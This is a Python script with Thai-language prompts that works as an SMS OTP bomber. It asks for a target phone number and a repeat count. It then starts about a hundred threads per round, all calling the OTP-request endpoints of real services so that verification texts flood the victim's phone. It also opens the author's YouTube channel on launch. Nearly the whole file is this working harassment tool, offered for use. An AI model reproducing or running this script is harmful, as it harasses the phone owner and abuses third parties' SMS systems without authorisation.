import requests
import os
import time
import threading
from threading import Thread
os.system("clear")
time.sleep (1)
print ("\t\x1b[91mกำลังโหลดครับรอแปปนะค้าบ.....")
time.sleep (5)
os.system ("clear")
time.sleep (1)
print ("\x1b[91mไปกดติดตามด้วย!!!")
time.sleep (1)
print ("\x1b[96m[\x1b[91m1\x1b[96m] \x1b[96mกดติดตามก่อนใช่ \x1b[91m:V")
time.sleep (1)
os.system("xdg-open https://youtube.com/channel/UCYoGVAuQViQCEuai5Onbbxg")
time.sleep (8)
print ("\x1b[96m[\x1b[91m2\x1b[96m] \x1b[96mกดติดตามผมด้วยครับ\x1b[91m:)")
time.sleep (1)
print ("\x1b[91m")
os.system ("clear")
time.sleep (1)
print("\033[92mํ_______________________110api____________")
print("")
print("\033[92FB.ภานุวัฒน์ ฯ./autozammza")
print("")
print("")
print("\033[92mYouTube:Amger FF")
print("list")
print("")
phone = input("\033[95m[+] Number : \033[0m")
num = int(input("\033[95m[+] How : \033[0m"))
os.system("clear")
print("\033[95m______________รอๆ______________")

def test(): 
	requests.post("https://api.true-shopping.com/customer/api/request-activate/mobile_no", data={"username": phone})
	print("\033[92m ยิงอยู่ครับใจเย็นๆใจเย็นๆ")
	
def test2():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test3():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test4():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test5():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test6():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test7():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test8():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test9():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test10():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test11():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test12():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test119():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test14():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test15():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test16():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test17():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test19():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test22():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test23():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test21():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test18():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test24():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test25():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test27():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test28():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test20():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test26():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test27():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test28():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test29():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test30():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test31():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test32():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test33():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test34():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test35():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test36():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")

def test37():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test38():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับใจเย็นๆ")
	
def test39():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test40():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test41():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test42():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test43():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test44():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test45():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test46():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test47():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test48():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test49():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test50():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test51():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test52():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test53():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test54():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test55():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test56():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test57():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")
	
def test58():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test59():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[96m ยิงอยู่ครับใจเย็นๆ")

def test60():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test61():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test62():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")
	
def test63():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test64():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test65():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test66():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test67():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test68():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test69():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test70():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test71():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test72():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")
	
def test73():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test74():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test75():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test76():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test77():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")
	
def test78():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test79():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test80():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test81():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test82():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test83():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test84():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test85():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test86():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test87():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test88():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test89():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test90():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test91():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test92():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test93():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test94():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test95():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test96():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test97():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test98():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")
	
def test99():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

def test100():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[95m ยิงอยู่ครับใจเย็นๆ")

for i in range(num):
	time.sleep(1)
	threading.Thread(target=test).start()
	threading.Thread(target=test2).start()
	threading.Thread(target=test3).start()
	threading.Thread(target=test4).start()
	threading.Thread(target=test5).start()
	threading.Thread(target=test6).start()
	threading.Thread(target=test7).start()
	threading.Thread(target=test8).start()
	threading.Thread(target=test9).start()
	threading.Thread(target=test10).start()
	threading.Thread(target=test11).start()
	threading.Thread(target=test12).start()
	threading.Thread(target=test14).start()
	threading.Thread(target=test15).start()
	threading.Thread(target=test16).start()
	threading.Thread(target=test17).start()
	threading.Thread(target=test18).start()
	threading.Thread(target=test19).start()
	threading.Thread(target=test20).start()
	threading.Thread(target=test21).start()
	threading.Thread(target=test22).start()
	threading.Thread(target=test24).start()
	threading.Thread(target=test25).start()
	threading.Thread(target=test26).start()
	threading.Thread(target=test27).start()
	threading.Thread(target=test28).start()
	threading.Thread(target=test29).start()
	threading.Thread(target=test30).start()
	threading.Thread(target=test31).start()
	threading.Thread(target=test32).start()
	threading.Thread(target=test33).start()
	threading.Thread(target=test34).start()
	threading.Thread(target=test35).start()
	threading.Thread(target=test36).start()
	threading.Thread(target=test37).start()
	threading.Thread(target=test38).start()
	threading.Thread(target=test39).start()
	threading.Thread(target=test40).start()
	threading.Thread(target=test41).start()
	threading.Thread(target=test42).start()
	threading.Thread(target=test43).start()
	threading.Thread(target=test44).start()
	threading.Thread(target=test45).start()
	threading.Thread(target=test46).start()
	threading.Thread(target=test47).start()
	threading.Thread(target=test48).start()
	threading.Thread(target=test49).start()
	threading.Thread(target=test50).start()
	threading.Thread(target=test51).start()
	threading.Thread(target=test52).start()
	threading.Thread(target=test53).start()
	threading.Thread(target=test54).start()
	threading.Thread(target=test55).start()
	threading.Thread(target=test56).start()
	threading.Thread(target=test57).start()
	threading.Thread(target=test58).start()
	threading.Thread(target=test59).start()
	threading.Thread(target=test60).start()
	threading.Thread(target=test61).start()
	threading.Thread(target=test62).start()
	threading.Thread(target=test63).start()
	threading.Thread(target=test64).start()
	threading.Thread(target=test65).start()
	threading.Thread(target=test66).start()
	threading.Thread(target=test67).start()
	threading.Thread(target=test68).start()
	threading.Thread(target=test69).start()
	threading.Thread(target=test70).start()
	threading.Thread(target=test71).start()
	threading.Thread(target=test72).start()
	threading.Thread(target=test73).start()
	threading.Thread(target=test74).start()
	threading.Thread(target=test75).start()
	threading.Thread(target=test76).start()
	threading.Thread(target=test77).start()
	threading.Thread(target=test78).start()
	threading.Thread(target=test79).start()
	threading.Thread(target=test80).start()
	threading.Thread(target=test81).start()
	threading.Thread(target=test82).start()
	threading.Thread(target=test83).start()
	threading.Thread(target=test84).start()
	threading.Thread(target=test85).start()
	threading.Thread(target=test86).start()
	threading.Thread(target=test87).start()
	threading.Thread(target=test88).start()
	threading.Thread(target=test89).start()
	threading.Thread(target=test90).start()
	threading.Thread(target=test91).start()
	threading.Thread(target=test92).start()
	threading.Thread(target=test93).start()
	threading.Thread(target=test94).start()
	threading.Thread(target=test95).start()
	threading.Thread(target=test96).start()
	threading.Thread(target=test97).start()
	threading.Thread(target=test98).start()
	threading.Thread(target=test99).start()
	threading.Thread(target=test100).start()